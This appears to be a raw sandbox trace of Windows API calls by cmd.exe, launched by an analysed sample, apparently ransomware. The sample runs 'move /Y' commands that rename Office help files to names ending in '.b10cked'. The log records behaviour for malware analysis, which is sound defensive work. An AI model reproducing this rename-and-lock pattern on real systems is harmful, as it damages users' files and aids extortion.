[0204.264] GetLocaleInfoW (in: Locale=0x409, 
LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0204.264] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0204.264] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0204.265] GetConsoleTitleW (in: lpConsoleTitle=0x3108d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.265] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0204.265] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0204.265] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0204.265] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0204.266] _wcsicmp (_String1="move", _String2=")") returned 68 [0204.266] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0204.266] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0204.266] _wcsicmp (_String1="IF", _String2="move") returned -4 [0204.266] _wcsicmp (_String1="IF/?", _String2="move") returned -4 
[0204.266] _wcsicmp (_String1="REM", _String2="move") returned 5 [0204.266] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0204.269] GetConsoleTitleW (in: lpConsoleTitle=0x12f720, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0204.649] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0204.650] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0204.650] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0204.650] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0204.650] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0204.650] _wcsicmp (_String1="move", _String2="CD") returned 10 [0204.650] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0204.650] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0204.650] _wcsicmp (_String1="move", _String2="REN") returned -5 [0204.650] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0204.650] _wcsicmp (_String1="move", _String2="SET") returned -6 [0204.650] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0204.650] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0204.650] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0204.650] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0204.650] _wcsicmp (_String1="move", _String2="MD") returned 11 [0204.650] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0204.650] _wcsicmp (_String1="move", _String2="RD") returned -5 [0204.650] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0204.650] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0204.650] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0204.651] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0204.651] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0204.651] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0204.651] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0204.651] _wcsicmp (_String1="move", _String2="VER") 
returned -9 [0204.651] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0204.651] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0204.651] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0204.651] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0204.651] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0204.651] _wcsicmp (_String1="move", _String2="START") returned -6 [0204.651] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0204.651] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0204.651] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0204.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.653] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0204.654] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x12f4dc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x12f4d4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x12f4d4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0204.654] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0204.655] _wcsnicmp 
(_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0204.655] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0204.656] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0204.656] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0204.656] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0204.656] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0204.656] _wcsnicmp (_String1="COPYCMD", 
_String2="windir=", _MaxCount=0x7) returned -20 [0204.656] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0204.656] _wcsicmp (_String1="MSOIS1~1.HXN", _String2=".") returned 63 [0204.656] _wcsicmp (_String1="MSOIS1~1.HXN", _String2="..") returned 63 [0204.656] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msois1~1.hxn")) returned 0x2022 [0204.657] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x321e30 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0204.657] SetErrorMode (uMode=0x0) returned 0x0 [0204.657] SetErrorMode (uMode=0x1) returned 0x0 [0204.657] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", nBufferLength=0x104, lpBuffer=0x12ee64, lpFilePart=0x12ee4c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", lpFilePart=0x12ee4c*="MSOIS1~1.HXN") returned 0x27 [0204.657] SetErrorMode (uMode=0x0) returned 0x1 [0204.657] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2" (normalized: "c:\\users\\alluse~1\\micros~2")) returned 0x2012 [0204.657] _wcsicmp (_String1="MSOIS1~1.HXN", _String2=".") returned 63 [0204.657] _wcsicmp (_String1="MSOIS1~1.HXN", _String2="..") returned 63 [0204.658] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN" (normalized: "c:\\users\\alluse~1\\micros~2\\msois1~1.hxn")) returned 0x2022 [0204.658] SetErrorMode (uMode=0x0) returned 0x0 [0204.658] SetErrorMode (uMode=0x1) returned 0x0 [0204.658] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", nBufferLength=0x104, lpBuffer=0x12f2e0, lpFilePart=0x12f078 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", lpFilePart=0x12f078*="MSOIS1~1.HXN") returned 0x27 [0204.658] SetErrorMode (uMode=0x0) returned 0x1 [0204.658] SetErrorMode (uMode=0x0) returned 0x0 [0204.658] SetErrorMode (uMode=0x1) returned 0x0 [0204.658] GetFullPathNameW (in: 
lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked", nBufferLength=0x104, lpBuffer=0x12f4e8, lpFilePart=0x12f078 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked", lpFilePart=0x12f078*="MS.OIS.14.1033.hxn.b10cked") returned 0x35 [0204.658] SetErrorMode (uMode=0x0) returned 0x1 [0204.658] SetLastError (dwErrCode=0x0) [0204.659] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MS.OIS.14.1033.hxn.b10cked" (normalized: "c:\\users\\alluse~1\\micros~2\\ms.ois.14.1033.hxn.b10cked")) returned 0xffffffff [0204.659] GetLastError () returned 0x2 [0204.659] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e9f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e9f4) returned 0x310e50 [0204.659] FindNextFileW (in: hFindFile=0x310e50, lpFindFileData=0x12e9f4 | out: lpFindFileData=0x12e9f4) returned 0 [0204.660] FindClose (in: hFindFile=0x310e50 | out: hFindFile=0x310e50) returned 1 [0204.660] GetLastError () returned 0x12 [0204.660] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x12e9f4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x12e9f4) returned 0x310e50 [0204.660] FindNextFileW (in: hFindFile=0x310e50, lpFindFileData=0x12e9f4 | out: lpFindFileData=0x12e9f4) returned 0 [0204.660] FindClose (in: hFindFile=0x310e50 | out: hFindFile=0x310e50) returned 1 [0204.661] GetLastError () returned 0x12 [0204.662] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x321bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bd0) returned 0x310e50 [0204.662] FindNextFileW (in: hFindFile=0x310e50, lpFindFileData=0x321bd0 | out: lpFindFileData=0x321bd0) returned 0 [0204.662] FindClose (in: hFindFile=0x310e50 | out: hFindFile=0x310e50) 
returned 1 [0204.662] GetLastError () returned 0x12 [0204.662] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~2\\MSOIS1~1.HXN", fInfoLevelId=0x1, lpFindFileData=0x321bd0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x321bd0) returned 0x310e50 [0204.662] FindNextFileW (in: hFindFile=0x310e50, lpFindFileData=0x321bd0 | out: lpFindFileData=0x321bd0) returned 0 [0204.662] FindClose (in: hFindFile=0x310e50 | out: hFindFile=0x310e50) returned 1 [0204.663] GetLastError () returned 0x12 [0204.663] _get_osfhandle (_FileHandle=2) returned 0xb [0204.663] GetFileType (hFile=0xb) returned 0x2 [0204.663] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0204.663] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x12ebc4 | out: lpMode=0x12ebc4) returned 1 [0204.663] _get_osfhandle (_FileHandle=2) returned 0xb [0204.663] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xb, lpConsoleScreenBufferInfo=0x12ebf8 | out: lpConsoleScreenBufferInfo=0x12ebf8) returned 1 [0204.664] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.665] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x12ec38 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0204.665] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0x12ec1c, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x12ec1c*=0x2c) returned 1 [0204.666] longjmp () [0204.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.666] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0204.666] _get_osfhandle (_FileHandle=1) returned 0x7 [0204.666] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 
[0204.667] _get_osfhandle (_FileHandle=0) returned 0x3 [0204.667] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0204.667] SetConsoleInputExeNameW () returned 0x1 [0204.667] GetConsoleOutputCP () returned 0x1b5 [0204.667] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0204.667] SetThreadUILanguage (LangId=0x0) returned 0x409 [0204.668] exit (_Code=1) Process: id = "471" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168c0" os_pid = "0xd2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSONEN~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.ONENOTE.14.1033.hxn.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 29296 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 29297 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 29298 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 29299 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 29300 start_va = 0x4a9c0000 end_va = 0x4aa0bfff 
entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 29301 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 29302 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 29303 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 29304 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 29305 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 29758 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 29759 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 29760 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 29761 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 29762 start_va = 0x3a0000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 29763 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 
region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 29764 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 29765 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 29766 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 29767 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 29768 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 29769 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 29770 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 29771 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 29772 start_va = 0x220000 end_va = 0x2e7fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 29773 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 29774 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 29775 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 29776 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 29777 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 29778 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 29779 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 29780 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 29781 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Region: id = 29978 start_va = 0x1320000 end_va = 0x13dffff entry_point = 0x1320000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui") Thread: id = 668 os_tid = 0x70c [0202.215] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afb04 | out: 
lpSystemTimeAsFileTime=0x1afb04*(dwLowDateTime=0xad55ff60, dwHighDateTime=0x1d440a9)) [0202.215] GetCurrentProcessId () returned 0xd2c [0202.215] GetCurrentThreadId () returned 0x70c [0202.215] GetTickCount () returned 0x39137 [0202.215] QueryPerformanceCounter (in: lpPerformanceCount=0x1afafc | out: lpPerformanceCount=0x1afafc*=25900415854) returned 1 [0202.215] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0202.215] __set_app_type (_Type=0x1) [0202.215] __p__fmode () returned 0x76b331f4 [0202.216] __p__commode () returned 0x76b331fc [0202.216] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0202.216] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0202.216] GetCurrentThreadId () returned 0x70c [0202.216] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x70c) returned 0x38 [0202.216] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0202.216] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0202.216] SetThreadUILanguage (LangId=0x0) returned 0x409 [0202.218] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0202.218] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afa94 | out: phkResult=0x1afa94*=0x0) returned 0x2 [0202.218] VirtualQuery (in: lpAddress=0x1afacb, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.218] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0202.218] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0202.218] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0202.218] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afa64, dwLength=0x1c | out: lpBuffer=0x1afa64*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0202.218] GetConsoleOutputCP () returned 0x1b5 [0202.219] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0202.219] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0202.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.219] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0202.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.219] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0202.219] _get_osfhandle (_FileHandle=1) returned 0x7 [0202.219] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0202.219] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.219] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0202.219] _get_osfhandle (_FileHandle=0) returned 0x3 [0202.219] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0202.220] GetEnvironmentStringsW () returned 0x3b0180* [0202.220] FreeEnvironmentStringsW (penv=0x3b0180) returned 1 [0202.220] GetEnvironmentStringsW () returned 0x3b0180* [0202.220] FreeEnvironmentStringsW (penv=0x3b0180) returned 1 
